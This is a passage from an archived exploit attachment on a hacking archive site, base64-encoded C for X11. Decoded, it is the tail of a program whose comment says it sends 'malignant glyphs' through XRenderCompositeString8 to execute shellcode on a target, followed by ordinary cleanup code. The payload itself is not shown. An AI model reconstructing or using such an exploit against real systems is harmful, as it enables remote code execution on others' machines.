ICAgICAgICAgICAgICBpZiAoKGkgPT0gMSkgJiYgKChjID09ICdxJykgfHwgKGMgPT0gJ1EnKSkp
IHsKICAgICAgICAgICAgICAgICAgICBkb25lID0gMTsKICAgICAgICAgICAgICAgIH0KICAgICAg
ICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICBjYXNlIEV4cG9zZToKICAgICAgICAgICAgICAg
IFhmdERyYXdSZWN0KGRhdGEtPmRyYXcsICZkYXRhLT5iZywKICAgICAgICAgICAgICAgICAgICAg
ICAgZXhwb3NlLT54LCBleHBvc2UtPnksCiAgICAgICAgICAgICAgICAgICAgICAgIGV4cG9zZS0+
d2lkdGgsIGV4cG9zZS0+aGVpZ2h0KTsKICAgICAgICAgICAgICAgIC8qIFNlbmQgbWFsaWduYW50
IGdseXBocyBhbmQgZXhlY3V0ZSBzaGVsbGNvZGUgb24gdGFyZ2V0ICovCiAgICAgICAgICAgICAg
ICBYUmVuZGVyQ29tcG9zaXRlU3RyaW5nOChkaXNwbGF5LCBQaWN0T3BPdmVyLAogICAgICAgICAg
ICAgICAgICAgICAgICBYZnREcmF3U3JjUGljdHVyZShkYXRhLT5kcmF3LCAmZGF0YS0+Y29sb3Ip
LAogICAgICAgICAgICAgICAgICAgICAgICBYZnREcmF3UGljdHVyZShkYXRhLT5kcmF3KSwgbWFz
aywgZ3NldCwKICAgICAgICAgICAgICAgICAgICAgICAgMCwgMCwgeHNjcmVlbnBvcywgMCwgc3Ry
aW5nLCBzdHJsZW4oc3RyaW5nKSk7CiAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICB9CiAg
ICB9CgogICAgZnJlZShnbHlwaHMpOwogICAgZnJlZSh4Z2x5cGhpZHMpOwogICAgZnJlZShidWYp
OwogICAgZnJlZShzdHJpbmcpOwoKICAgIFhGbHVzaChkaXNwbGF5KTsKICAgIFhVbm1hcFdpbmRv
dyhkYXRhLT5kaXNwbGF5LCBkYXRhLT53aW4pOwogICAgWFVuZ3JhYktleWJvYXJkKGRhdGEtPmRp
c3BsYXksIEN1cnJlbnRUaW1lKTsKICAgIFhDbG9zZURpc3BsYXkoZGlzcGxheSk7CiAgICBleGl0
KEVYSVRfU1VDQ0VTUyk7Cn0K

--=_mixed 006A029388257209_=--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.